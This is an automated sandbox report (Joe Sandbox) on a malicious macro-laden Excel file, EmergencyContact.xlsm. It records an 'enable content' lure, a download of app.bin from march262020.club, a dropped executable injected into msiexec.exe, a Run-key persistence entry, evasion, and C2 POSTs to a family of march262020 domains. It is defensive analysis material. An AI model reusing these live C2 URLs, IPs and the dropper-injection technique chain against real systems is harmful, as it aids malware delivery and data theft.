

Analysis Report EmergencyContact.xlsm

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 218575
Start date: 27.03.2020
Start time: 18:28:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 16s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: EmergencyContact.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@6/5@10/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 61.5% (good quality ratio 60.6%)
  • Quality average: 87.2%
  • Quality standard deviation: 20.6%
HCA Information:
  • Successful, ratio: 70%
  • Number of executed functions: 75
  • Number of non-executed functions: 127
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Detection
Threshold | 100 | 0 - 100 | | false | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes



Mitre Att&ck Matrix

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment
Execution: Execution through API (2); Exploitation for Client Execution (33); Graphical User Interface (1); Scheduled Task; Command-Line Interface; Graphical User Interface; Scripting
Persistence: Registry Run Keys / Startup Folder (1); Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service; Path Interception
Privilege Escalation: Access Token Manipulation (1); Process Injection (412); Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service; Scheduled Task
Defense Evasion: Masquerading (1); Disabling Security Tools (1); Software Packing (2); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (412); Obfuscated Files or Information (2)
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception
Discovery: Virtualization/Sandbox Evasion (1); Process Discovery (1); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (13); System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote File Copy (12); Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged; Screen Capture; Email Collection
Exfiltration: Data Encrypted (1); Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel
Command and Control: Standard Cryptographic Protocol (1); Remote File Copy (12); Standard Non-Application Layer Protocol (3); Standard Application Layer Protocol (123); Standard Cryptographic Protocol; Commonly Used Port; Uncommonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact

Signature Overview



Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 2_2_00428900
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then call 00419D40h | 2_2_00423380
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov esi, eax | 2_2_00424440
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx edx, byte ptr [eax+esi] | 2_2_00423C00
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov byte ptr [edi], bl | 2_2_0041D660
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then cmp word ptr [eax], cx | 2_2_00426E00
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [eax] | 2_2_0041EF50
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then cmp word ptr [eax], cx | 2_2_003E7050
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov byte ptr [edi], bl | 2_2_003DD8B0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [eax] | 2_2_003DF1A0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 2_2_003E8B50
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then call 003D9F90h | 2_2_003E35D0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx edx, byte ptr [eax+esi] | 2_2_003E3E50
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov esi, eax | 2_2_003E4690
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 4_2_00098900
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then call 00089D40h | 4_2_00093380
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then movzx edx, byte ptr [eax+esi] | 4_2_00093C00
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then mov esi, eax | 4_2_00094440
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then cmp word ptr [eax], cx | 4_2_00096E00
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then mov byte ptr [edi], bl | 4_2_0008D660
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then movzx ecx, byte ptr [eax] | 4_2_0008EF50
Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: march262020.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.2.2:49160 -> 170.106.11.8:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.2:49160 -> 170.106.11.8:80

Networking:

Found C&C like URL pattern
Source: global traffic | HTTP traffic detected: POST /post.php HTTP/1.1 | Accept: */* | Cache-Control: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 | Host: march262020.club | Content-Length: 300 | Connection: Close
Source: global traffic | HTTP traffic detected: POST /post.php HTTP/1.1 | Accept: */* | Cache-Control: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 | Host: march262020.com | Content-Length: 300 | Connection: Close
Downloads executable code via HTTP
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 27 Mar 2020 17:30:37 GMT | Content-Type: application/octet-stream | Content-Length: 245248 | Connection: keep-alive | Last-Modified: Fri, 27 Mar 2020 15:28:13 GMT | ETag: "3be00-5a1d7bfe43d40" | Accept-Ranges: bytes
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: Joe Sandbox View | ASN Name: unknown unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET /files/app.bin HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: march262020.club | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /post.php HTTP/1.1 | Accept: */* | Cache-Control: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 | Host: march262020.club | Content-Length: 300 | Connection: Close
Source: global traffic | HTTP traffic detected: POST /post.php HTTP/1.1 | Accept: */* | Cache-Control: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 | Host: march262020.com | Content-Length: 300 | Connection: Close
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C257964.jpeg
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /files/app.bin HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: march262020.club | Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: march262020.club
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /post.php HTTP/1.1 | Accept: */* | Cache-Control: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 | Host: march262020.club | Content-Length: 300 | Connection: Close
Urls found in memory or binary data
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.best/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.club/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.com/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.live/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.live/post.phpU
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.live/post.phpcs
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.network/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.online/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.site/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.store/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://march262020.tech/post.php
Source: msiexec.exe, 00000004.00000002.1503895928.0051B000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://www.march262020.live/post.php
Source: msiexec.exe, 00000004.00000002.1503895928.0051B000.00000004.00000020.sdmp | String found in binary or memory: http://www.march262020.live/post.php-
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://www.march262020.live/post.phpAS
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmp | String found in binary or memory: http://www.march262020.live/post.phph

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing" and then "Enable Content' on the yelbw bar above to display the content. 18 19 D
Source: Screenshot number: 4 | Screenshot OCR: PROTECTED DOCUMENT ' I 6 7 : , CANTVEIWTHE CONTENT? &EAQ1HEMQWSIEES 10 11 1. Openthe documenti
Source: Screenshot number: 4 | Screenshot OCR: Enable Content' on the yelbw bar above to display the content. 18 19 D CI Cl 20 21 22 23 24
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing" and then "Enable Content" on the yellow bar above to displaythe content.
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. 2. Use a Desktop or Laptop. Protected documentdo notwork on mobile phones ort
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content" on the yellow bar above to displaythe content.
Source: Document image extraction number: 1 | Screenshot OCR: PROTECTED DOCUMENT cANryE[!utiEm!yIE!ylzmc!IHEmQwsTEps I. Openthe document in Microsoft Office. P
Source: Document image extraction number: 1 | Screenshot OCR: Enable ContenT on the yellow bar above to display the content.
Detected potential crypto function
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_0040ABC0 | 2_2_0040ABC0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_004034A0 | 2_2_004034A0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_0040A7E0 | 2_2_0040A7E0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_003CAA30 | 2_2_003CAA30
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_003CAE10 | 2_2_003CAE10
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_003C36F0 | 2_2_003C36F0
Source: C:\Windows\System32\msiexec.exe | Code function: 4_2_0007ABC0 | 4_2_0007ABC0
Source: C:\Windows\System32\msiexec.exe | Code function: 4_2_000734A0 | 4_2_000734A0
Source: C:\Windows\System32\msiexec.exe | Code function: 4_2_0007A7E0 | 4_2_0007A7E0
Classification label
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSM@6/5@10/2
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Windows\System32\msiexec.exe | Code function: 4_2_00092080 AdjustTokenPrivileges,CloseHandle, | 4_2_00092080
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$EmergencyContact.xlsm
Creates mutexes
Source: C:\Windows\System32\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{63BC39C8-1AFC-D9E5-83D4-5C1F23358D0A}
Source: C:\Windows\System32\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{F32D0B54-2860-4974-83D4-5C1F23358D0A}
Source: C:\Windows\System32\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{43C409C8-2AFC-F99D-83D4-5C1F23358D0A}
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR1215.tmp
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\System32\msiexec.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\msiexec.exe | File read: C:\Windows\System32\drivers\etc\hosts
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe 'C:\cYNhYPc\mVVJuWs\FTBSEIi.exe'
Source: unknown | Process created: C:\Windows\System32\msiexec.exe msiexec.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Imed\tufi.exe 'C:\Users\user\AppData\Roaming\Imed\tufi.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe 'C:\cYNhYPc\mVVJuWs\FTBSEIi.exe'
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Process created: C:\Windows\System32\msiexec.exe msiexec.exe
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Unpacked PE file: 2.2.FTBSEIi.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Unpacked PE file: 2.2.FTBSEIi.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_0040D8F0 LoadLibraryA,GetProcAddress, | 2_2_0040D8F0
Uses code obfuscation techniques (call, push, ret)
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_0042B18B push esi; ret | 2_2_0042B1B4
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_001BB878 push esi; ret | 2_2_001BB8B1
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_001AD984 push esi; retf | 2_2_001AD985
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_001AC1D3 push esp; iretd | 2_2_001AC21C
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_001AA357 push edx; retf | 2_2_001AA45C
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_001AA440 push edx; retf | 2_2_001AA45C
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_003EA5DB push esi; ret | 2_2_003EA604
Source: C:\Windows\System32\msiexec.exe | Code function: 4_2_0009B18B push esi; ret | 4_2_0009B1B4
Source: C:\Windows\System32\msiexec.exe | Code function: 4_2_0009CCBB push edx; ret | 4_2_0009CCE6

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\System32\msiexec.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Witaubi
Source: C:\Windows\System32\msiexec.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Witaubi

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (25 identical entries)

Malware Analysis System Evasion:

Found evasive API chain checking for process token information
Source: C:\Windows\System32\msiexec.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_4-15646
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\msiexec.exe TID: 1260 | Thread sleep count: 31 > 30
Source: C:\Windows\System32\msiexec.exe TID: 2160 | Thread sleep count: 158 > 30
Source: C:\Windows\System32\msiexec.exe TID: 2160 | Thread sleep time: -9480000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 2160 | Thread sleep time: -60000s >= -30000s

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_0040D8F0 LoadLibraryA,GetProcAddress, | 2_2_0040D8F0
Contains functionality to read the PEB
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_0041F3E0 mov eax, dword ptr fs:[00000030h] | 2_2_0041F3E0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_001A7CD3 push dword ptr fs:[00000030h] | 2_2_001A7CD3
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_003C092B mov eax, dword ptr fs:[00000030h] | 2_2_003C092B
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_003C0D90 mov eax, dword ptr fs:[00000030h] | 2_2_003C0D90
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 2_2_003DF630 mov eax, dword ptr fs:[00000030h] | 2_2_003DF630
Source: C:\Windows\System32\msiexec.exe | Code function: 4_2_0008F3E0 mov eax, dword ptr fs:[00000030h] | 4_2_0008F3E0

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe  Memory allocated: C:\Windows\System32\msiexec.exe base: 70000 protect: page read and write
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe  Memory allocated: C:\Windows\System32\msiexec.exe base: A0000 protect: page read and write
Contains functionality to inject code into remote processes
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe  Code function: 2_2_004172D0 EntryPoint,CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess
Modifies the context of a thread in another process (thread injection)
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe  Thread register set: target process: 400
Writes to foreign memory regions
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe  Memory written: C:\Windows\System32\msiexec.exe base: 70000
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe  Memory written: C:\Windows\System32\msiexec.exe base: A0000
Creates a process in suspended mode (likely to inject code)
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe  Process created: C:\Windows\System32\msiexec.exe msiexec.exe
May try to detect the Windows Explorer process (often used for injection)
Source: msiexec.exe, 00000004.00000002.1511882623.00730000.00000002.00000001.sdmp  Binary or memory string: Program Manager
Source: msiexec.exe, 00000004.00000002.1511882623.00730000.00000002.00000001.sdmp  Binary or memory string: Progman
Source: msiexec.exe, 00000004.00000002.1511882623.00730000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Queries the product ID of Windows
Source: C:\Windows\System32\msiexec.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Queries the cryptographic machine GUID
Source: C:\Windows\System32\msiexec.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Malware Configuration

No configs have been found

Behavior Graph

(Graph image not included in this extract. Its legend distinguishes processes, signatures, created files, DNS/IP info, dropped files, Windows processes, counts of created registry values and files, the binary's language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), malicious nodes and Internet nodes.)

Simulations

Behavior and APIs

Time | Type | Description
18:32:01 | API Interceptor | 541x Sleep call for process: msiexec.exe modified
18:32:07 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Witaubi C:\Users\user\AppData\Roaming\Imed\tufi.exe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
EmergencyContact.xlsm | 2% | Virustotal | -

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
2.3.FTBSEIi.exe.600000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.msiexec.exe.70000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.FTBSEIi.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.3.tufi.exe.200000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.3.msiexec.exe.220000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://march262020.site/post.php | 0% | Avira URL Cloud | safe
http://www.march262020.live/post.phpAS | 0% | Avira URL Cloud | safe
http://march262020.club/post.php | 0% | Avira URL Cloud | safe
http://march262020.live/post.phpcs | 0% | Avira URL Cloud | safe
http://march262020.store/post.php | 0% | Avira URL Cloud | safe
http://www.march262020.live/post.php | 0% | Avira URL Cloud | safe
http://www.march262020.live/post.phph | 0% | Avira URL Cloud | safe
http://march262020.club/files/app.bin | 0% | Avira URL Cloud | safe
http://www.march262020.live/post.php- | 0% | Avira URL Cloud | safe
http://march262020.live/post.php | 0% | Avira URL Cloud | safe
http://march262020.com/post.php | 0% | Avira URL Cloud | safe
http://march262020.best/post.php | 0% | Avira URL Cloud | safe
http://march262020.network/post.php | 0% | Avira URL Cloud | safe
http://march262020.tech/post.php | 0% | Avira URL Cloud | safe
http://march262020.online/post.php | 0% | Avira URL Cloud | safe
http://march262020.live/post.phpU | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
119.28.234.224 | EmergencyContact.xlsm | malicious | -
170.106.11.8 | EmergencyContact.xlsm | malicious | march262020.com/post.php

Domains

Match: parkingpage.namecheap.com
Associated Sample Name / URL | Detection | Context
EmergencyContact.xlsm | malicious | 198.54.117.218
Resume John Doe.doc | malicious | 198.54.117.211
analysis.xlsm | malicious | 198.54.117.218
analysis.xlsm | malicious | 198.54.117.215
analysis.xlsm | malicious | 198.54.117.215
2201283765ref20181203_pdf.exe | malicious | 198.54.117.211
23Order A32443u43.exe | malicious | 198.54.117.215
74Request for Quotation.exe | malicious | 198.54.117.218
PO OMULQP214R8.xlsx | malicious | 198.54.117.215
12PO Order No. 305930960MN.exe | malicious | 198.54.117.211
faktura_151018_9022871.vbs | malicious | 198.54.117.218
faktura_111018_0077975.vbs | malicious | 198.54.117.215
13PAYMENT-Jawharat Al-Wefaq Gen. Trad. & Cont. Corp.doc | malicious | 198.54.117.211
22DOC1.exe | malicious | 198.54.117.215
42PAYMENT INSTRUCTION.exe | malicious | 198.54.117.210
15request.exe | malicious | 198.54.117.215
7INV_P-130828-01.exe | malicious | 198.54.117.216
http://blockchaln.info | malicious | 198.54.117.215
17scantr doc.exe | malicious | 198.54.117.211
69IMG_0047.exe | malicious | 198.54.117.211

Match: march262020.club
Associated Sample Name / URL | Detection | Context
EmergencyContact.xlsm | malicious | 170.106.11.8

ASN

Match: unknown
Associated Sample Name / URL | Detection | Context
EmergencyContact.xlsm | malicious | 162.255.119.36
New inv.976215.xls | malicious | 192.168.2.255
sample1-unpacked.exe | malicious | 16.121.0.129
sample1-unpacked.exe | malicious | 16.91.196.254
Req_Form6982.xls | malicious | 47.91.88.100
sample1.exe | malicious | 167.89.123.54
rept-1194.xls | malicious | 47.91.88.100
sample1.exe | malicious | 16.100.81.99
https://ankitchawlaphotography.com/staple/433426.zip | malicious | 127.0.0.1
https://onedrive.live.com/redir?resid=3A73AD1A7DAF274C!1235&authkey=!AMMPdXLDeVZdNDs&ithint=file%2cpdf | malicious | 52.114.132.20
https://carexpert.ee/2rehvid/api/hotmail-verifly/index.php?email=martin.piller@abcsupply.com | malicious | 88.99.147.202
Invoice-No-583.xls | malicious | 47.91.88.100
http://perfumegallery.com.au/OMACH/FBG/ | malicious | 162.241.174.123
http://d19b4k8ycsi5o2.cloudfront.net/d/?id=jHhgjdgd-JHShgfs-JHsgsh&p1=innodom53.com/man/alessandroa@herbalife.com | malicious | 152.199.23.37
cybx.js | malicious | 180.180.123.9
cybx.js | malicious | 180.180.123.9
recoverit_setup_full4174.exe | malicious | 47.91.67.36
Invoice_ID.787228.xls | malicious | 47.91.88.100
Info.42171.xls | malicious | 192.168.2.255
open_presentation_m8w.js | malicious | 5.53.125.140

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.